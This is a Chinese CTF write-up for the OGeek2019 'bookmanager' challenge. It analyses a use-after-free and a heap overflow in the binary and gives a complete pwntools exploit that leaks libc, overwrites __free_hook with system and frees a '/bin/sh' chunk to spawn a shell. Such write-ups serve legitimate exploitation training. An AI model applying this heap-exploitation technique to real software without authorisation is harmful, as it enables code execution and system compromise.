[OGeek2019]bookmanager
<p>[TOC]</p>
<h1>分析</h1>
<p>该题的漏洞还挺多的,我就找到了两个</p>
<p><img src="https://pic.imgdb.cn/item/63a8691e08b68301639b1efe.png" alt="" /> </p>
<p>Section删除存在UAF(下面的exploit并没有用到这个UAF,只利用了第二个漏洞——Text更新时的堆溢出)</p>
<p><img src="https://pic.imgdb.cn/item/63a8698c08b68301639bc129.png" alt="" /> </p>
<p>Text更新存在堆溢出。Chapter申请的是0x90的chunk,Section是0x40的chunk,Text是小于0x100的chunk。利用思路:先申请一个Text(0xf0),再申请一个Chapter使其紧跟在Text之后,然后释放该Chapter,它进入unsorted bin后fd/bk指向main_arena;接着用Text更新的溢出把Text填满0x100字节(中间不留\0截断),再用打印功能把紧随其后的fd指针泄露出来,算出libc基址(本题为glibc 2.23,fd减0x68即为__malloc_hook)。之后先用同一溢出把被破坏的Chapter chunk头(size=0x91)修复好再释放Text,重新申请一个小Text,并申请几个Section直到有一个Section正好落在Text的chunk之下,再次溢出把该Section的Text指针改为__free_hook,最后通过更新Text向__free_hook写入system,删除name为/bin/sh的Section即可触发free拿到shell。</p>
<h1>Exploit</h1>
<pre><code>from pwn import*
# context.log_level = 'debug'
# Local debugging: replace the remote() below with process('./pwn').
# o = process('./pwn')
HOST, PORT = 'node4.buuoj.cn', 29446
# Shared tube to the challenge instance; every helper below talks through it.
o = remote(HOST, PORT)
# libc shipped with the challenge; symbol offsets are taken from it after the leak.
libc = ELF('./libc-2.23.so')
# The binary asks for a book name before it shows the menu.
o.sendlineafter('Name of the book you want to create: ', 'name')
def addChapter(name):
    """Menu option 1: create a chapter called `name` (a 0x90 chunk per the analysis above)."""
    # Answer each (prompt, reply) pair in order on the shared tube `o`.
    for prompt, reply in (('Your choice:', '1'), ('Chapter name:', name)):
        o.sendlineafter(prompt, reply)
def addSection(chapter, section):
    """Menu option 2: add a section named `section` under chapter `chapter`.

    After the chapter is chosen the binary prints one line that is parsed
    here as a hex number of the form "0x...". That value is returned; the
    exploit below never uses it.
    """
    o.sendlineafter('Your choice:', '2')
    o.sendlineafter('Which chapter do you want to add into:', chapter)
    printed = o.recvline()
    # Drop the leading "0x" and the trailing newline before parsing.
    value = int(printed[2:-1], 16)
    o.sendlineafter('Section name:', section)
    return value
def addText(section, num, text):
    """Menu option 3: attach `text` to the section named `section`.

    `num` is sent as a decimal string in reply to the (oddly worded)
    "How many chapters ..." prompt; presumably it is the Text size, since
    the exploit passes 0xf0 and 0x10 here to get 0x100 and 0x20 chunks.
    """
    replies = (
        ('Your choice:', '3'),
        ('Which section do you want to add into:', section),
        ('How many chapters you want to write:', str(num)),
        ('Text:', text),
    )
    for prompt, reply in replies:
        o.sendlineafter(prompt, reply)
def rmChapter(chapter):
    """Menu option 4: delete the chapter called `chapter`."""
    for prompt, reply in (('Your choice:', '4'), ('Chapter name:', chapter)):
        o.sendlineafter(prompt, reply)
def rmSection(section):
    """Menu option 5: delete the section called `section`.

    The analysis above says this path has a UAF; the exploit only uses it
    as the final free() that fires the hijacked __free_hook.
    """
    for prompt, reply in (('Your choice:', '5'), ('Section name:', section)):
        o.sendlineafter(prompt, reply)
def rmText(section):
    """Menu option 6: free the Text attached to the section called `section`."""
    for prompt, reply in (('Your choice:', '6'), ('Section name:', section)):
        o.sendlineafter(prompt, reply)
def updateSection(section, text):
    """Menu option 8 / "Section": rename section `section` to `text`.

    Defined for completeness; the exploit below never calls it.
    """
    replies = (
        ('Your choice:', '8'),
        ('What to update?(Chapter/Section/Text):', 'Section'),
        ('Section name:', section),
        ('New Section name:', text),
    )
    for prompt, reply in replies:
        o.sendlineafter(prompt, reply)
def updateText(section, text):
    """Menu option 8 / "Text": overwrite the Text of section `section` with `text`.

    This is the heap-overflow primitive from the analysis: the new text is
    not bounded by the original Text allocation, so a payload longer than
    the Text chunk spills into whatever chunk follows it on the heap.
    """
    replies = (
        ('Your choice:', '8'),
        ('What to update?(Chapter/Section/Text):', 'Text'),
        ('Section name:', section),
        ('New Text:', text),
    )
    for prompt, reply in replies:
        o.sendlineafter(prompt, reply)
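# --- Stage 1: leak libc through the unsorted-bin fd pointer -----------------
# Heap layout goal: [Text of 'b' (0x100 chunk)][Chapter 'e' (0x90 chunk)] adjacent.
addChapter('a'*8)
addSection('a'*8, 'b'*8)
addText('b'*8, 0xf0, b'd'*6)
addChapter('e'*8)
addSection('e'*8, 'f'*8)
# Chapter 'e' is 0x90 (beyond fastbin range), so freeing it puts it in the
# unsorted bin and its fd/bk now point into main_arena.
rmChapter('e'*8)
# Heap overflow: fill the whole 0x100 Text chunk with no NUL byte so that the
# print routine runs straight past it into the freed chapter's fd. This also
# clobbers that chunk's prev_size/size fields; they are repaired below before
# anything is freed again.
updateText('b'*8, b'd'*0x100)
o.sendlineafter('Your choice:', '7')
o.recvuntil(b'd'*0x100)
# On glibc 2.23 the unsorted-bin fd points at main_arena+0x58 and
# __malloc_hook sits at main_arena-0x10, hence the 0x68 delta.
# ljust() with a bytes pad (instead of `+ "\x00\x00"`) keeps this bytes-only,
# so it runs under Python 3 pwntools as well as Python 2.
malloc_hook = u64(o.recv(6).ljust(8, b'\x00')) - 0x68
libc_base = malloc_hook - libc.sym['__malloc_hook']
log.info("libc_base: %x", libc_base)
free_hook = libc.sym['__free_hook'] + libc_base
system = libc.sym['system'] + libc_base

# --- Stage 2: put a Section right behind the Text and hijack its text pointer
# Restore the freed chapter's header (prev_size=0, size=0x91) that the 0x100
# overflow destroyed: free() sanity-checks the next chunk's size, so the
# header has to look sane again before the Text is released.
updateText('b'*8, b'd'*0xf0 + p64(0) + p64(0x91))
rmText('b'*8)
# Re-allocate a small Text (0x20 chunk) from the freed region; the Section
# allocations that follow are carved out right behind it.
addText('b'*8, 0x10, b'cccc')
addSection('a'*8, 'h'*8)
BINSH = b'/bin/sh\x00'
addSection('a'*8, BINSH)
# Overflow from the 0x10 Text into the adjacent Section (0x40 chunk):
#   [16 bytes text][prev_size=0][size=0x41][name='/bin/sh'][3 qwords][text ptr]
# The name is set to '/bin/sh' so the struct itself can serve as the system()
# argument when it is presumably free()d by rmSection below, and the pointer
# at struct offset 0x20 (the Text pointer, per the analysis) is redirected to
# __free_hook. All pieces are bytes so the concatenation works on Python 3.
updateText('b'*8, p64(0)*3 + p64(0x41) + BINSH + p64(0)*3 + p64(free_hook))
# "Updating the text" of that section now writes through the hijacked
# pointer: __free_hook = system.
updateText(BINSH, p64(system))

# --- Stage 3: free the '/bin/sh' section -> __free_hook('/bin/sh') ----------
rmSection(BINSH)
o.interactive()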
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63a86a7508b68301639d6153.png" alt="" /></p>